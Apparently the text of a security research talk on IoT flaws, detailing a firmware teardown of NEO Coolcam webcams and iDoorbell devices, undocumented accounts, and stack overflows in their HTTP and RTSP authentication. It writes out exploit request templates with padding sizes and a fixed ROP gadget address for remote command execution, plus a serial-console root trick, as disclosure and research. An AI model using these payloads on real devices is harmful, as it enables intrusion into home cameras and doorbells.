IoT – The gift that keeps on giving
Host:
Alex “Jay” Balan – Chief Security Researcher
[email protected] | @jaymzu
Contributors – [email protected]
Radu Alexandru Basaraba - [email protected]
Alexandru Lazar – [email protected]
Mihai Moldovan - [email protected]
• Chapter 1 – The crazy state of IoT
• Chapter 2 – From China with love
• First findings
• Quick crash course into IoT hacking
• Demo
• Chapter 3 – The gift that keeps on giving
CHAPTER 1: The crazy state of IoT
RENTED A CONNECTED CAR ONCE…
SMART EVERYTHING
Smart Portable fish finder
Smart lightbulb & WiFi repeater
Smart Lightbulb
Smart Thermostat
Smart Yoga Mat
Smart Music Player
Smart Barbie doll
Smart Power Outlet
Smart Coffee Maker
IT TAKES A SPECIAL KIND OF CRAZY TO TRY THIS
THE MOST COMMON ISSUES
• Undocumented hardcoded passwords
• Weak or no encryption
• Command injection
• Very old services
• WiFi configuration hotspots
• Bad UX on Firmware updates
• Port forwarding / UPnP
• Device – cloud – mobile app cloud sync
• Poor input validation => command injection
THE MOST DANGEROUS ISSUES
MOST IOT SECURITY PAPERS ARE FOCUSED ON PROXIMITY BASED ATTACKS
• MITM the Bluetooth key exchange
• Get shell on some device in your house
• Etc…
• Attacks that require proximity have their charm
MASS HACKS NEED MORE LOVE
IOT IS JUST HARDWARE + OS + APP (+ CLOUD)
(Slide figure: example components at each layer: wu-ftpd, IIS 5.0, RDP, and Joomla as the app)
WHY IS THAT A PROBLEM ?
• No standards or security reviews for 90% of what’s out there
• Each company builds their own app with almost no experience with how security works
CHAPTER 2
FROM CHINA WITH LOVE
IDOORBELL & NEO COOLCAM
SETTING IT UP – STANDARD LINKSYS ROUTER
SETTING IT UP – SETUP FLOW
Flow is identical for both the doorbell and the webcam
FROM A PERFECTLY GOOD ROUTER
TO SWISS CHEESE
SHODAN SAYS THIS HAS GREAT POTENTIAL
AT THIS POINT WE WENT THROUGH THE USUAL FIRST STEPS
• Wireshark
• Mobile app unpacking
• Check for weak encryption
• Check webapp for various vectors
• Etc…
• We realized that we’ve become used to a number of stupid things
• …and cheered when we found things that should be common sense
• Encryption in cloud communication (yey!)
• No encryption on direct connections (boo!)
SO…
YOU SEE AN INPUT FIELD… YOU FUZZ IT
Sadly, the good folks at Neo Shenzhen decided not to let us have too much fun.
Crash on the first try…
The RTSP server didn’t crash with the same method, though (yet)
I’M A SIMPLE MAN. I SEE A CRASH, I GET AROUSED
HOOK-UP TO SERIAL
GREAT SUCCESS! NO CREDENTIALS THOUGH
GOT ROOT ?
Pause boot loader: pass init=/bin/bash to kernel
Use dumb shell to add telnetd to startup
FIRST FINDS – UNDOCUMENTED USERS
FIRST FINDS – AND THIS – ONE BINARY TO RULE THEM ALL (BECAUSE WHY NOT?)
• Webserver
• RTSP server
• Authentication for webserver
• Authentication for RTSP
DEBUG TIME!
cp -r / /path/to/sdcard
HTTP AUTH
When checking auth at http://<ip>/?usr=<user>&pwd=<password>, libs_parsedata copies the content of those two arguments onto the stack without checking whether they fit, resulting in an out-of-bounds write.
0x460 bytes allocated on the stack
HTTP AUTH
ASLR is enabled
However…
No PIE = the binary will always load at the same address
We’ll use the ROP gadget at 0x0007EDD8 to put the stack pointer (which now points at our command) into R0, then call the system function to execute our command
GET /?usr=<204bytes><command>&pwd=<328bytes><0xD8ED07> HTTP/1.1
* checksec.sh - http://www.trapkit.de/tools/checksec.html
THE “ALMIGHTY” EXPLOIT
RTSP
• Tried to fuzz user/pass again – didn’t get so lucky this time
• Back to basics…
The RTSP server uses digest authentication and it seems they implemented it themselves… poorly
field & value are implied to hold 256 bytes (0x100) each
Strings of unlimited size are scanned into field & value
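As an added example (not the researchers’ code and not the vendor’s firmware), the two parsers described on these slides in a bounded form: the HTTP usr/pwd argument copy and the RTSP digest field/value scan. The buffer sizes come from the slides; the helper name find_arg and the function names are assumed, and the sscanf shape of the original scan is a presumption from the word “scanned”.

```c
#include <stdio.h>
#include <string.h>

/* Sizes from the slides: 0x460 bytes on the stack in the HTTP parser,
 * 0x100 (256) bytes each for the RTSP digest field and value. */
#define HTTP_BUF_SIZE    0x460
#define DIGEST_PART_SIZE 0x100

/* Assumed helper: find argument `name` in a query like "usr=a&pwd=b".
 * Returns a pointer to its value and stores the value length, or NULL. */
static const char *find_arg(const char *query, const char *name, size_t *len) {
    size_t nlen = strlen(name);
    const char *p = query;
    while (p && *p) {
        if (strncmp(p, name, nlen) == 0 && p[nlen] == '=') {
            const char *v = p + nlen + 1, *e = strchr(v, '&');
            *len = e ? (size_t)(e - v) : strlen(v);
            return v;
        }
        p = strchr(p, '&');
        if (p) p++;
    }
    return NULL;
}

/* HTTP auth: the slides describe usr/pwd being copied to a fixed stack
 * buffer with no size check. Here the value is copied into `out` only
 * when it fits together with its terminating NUL; otherwise -1. */
int http_arg_bounded(const char *query, const char *name, char *out, size_t outlen) {
    size_t len;
    const char *v = find_arg(query, name, &len);
    if (!v || len >= outlen) return -1;   /* absent, or would overflow */
    memcpy(out, v, len);
    out[len] = '\0';
    return (int)len;
}

/* RTSP digest: the slides describe 0x100-byte field/value buffers filled by
 * an unbounded scan (presumably sscanf without widths, of the shape
 * sscanf(p, "%[^=]=\"%[^\"]\"", f, v)). Width specifiers cap each conversion
 * at 255 chars, and %n is assigned only if the closing quote matched, so an
 * over-long (truncated) value is rejected instead of silently accepted. */
int digest_param_bounded(const char *param, char field[DIGEST_PART_SIZE],
                         char value[DIGEST_PART_SIZE]) {
    int consumed = 0;
    if (sscanf(param, "%255[^=]=\"%255[^\"]\"%n", field, value, &consumed) != 2
        || consumed == 0)
        return -1;
    return consumed;          /* bytes consumed, e.g. 16 for username="admin" */
}
```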
RTSP EXPLOIT
Same binary – we’ll use the same gadget as for HTTP. The request looks like this:
DESCRIBE rtsp://<IP>:554/ RTSP/1.0
Authorization: Digest <296 bytes><command>="<548 bytes><0xD8ED07>"
DEMO
20 YEARS AGO CALLED. ROOT SHELL BY PASSING 200 CHARS TO LOGIN RING A BELL TO ANYONE?
FROM CHINA WITH LOVE - KEY TAKEAWAYS
• Setup flow requests a password change but there are 2
undocumented users that device owners don’t know exist
• A really lame overflow leads to RCE. Base system provides ASLR
but the app “architecture” decided it’d be a good idea to not use it
• Seriously, check & disable UPnP on your routers
• It’s hard to tell how many affected devices are in the wild since we
don’t know how many (other) vendors use this firmware but at this
point we’re looking at more than 200k
• RCE for other models will require adding other targets to the
exploit
THE GIFT THAT KEEPS ON GIVING
• We need a “security certification” system of sorts for IoT that looks
at more than “military grade encryption”
• We need to educate or otherwise “stimulate” the vendors to have a
proper incident response process and unattended update
mechanisms
• We need to educate the users to get tools that can handle the
security of their non-traditional devices. At the very least
vulnerability checkers
• There are vulnerabilities discovered in apps every day but at the
rate IoT is developing we’ll have stuff to talk about for ages
• IoT security papers are low-hanging fruit. Almost everything is not
only broken but also, sometimes, unfixable
• Focus on remote exploits and mass hacks since that’s what the bad
guys are going to focus on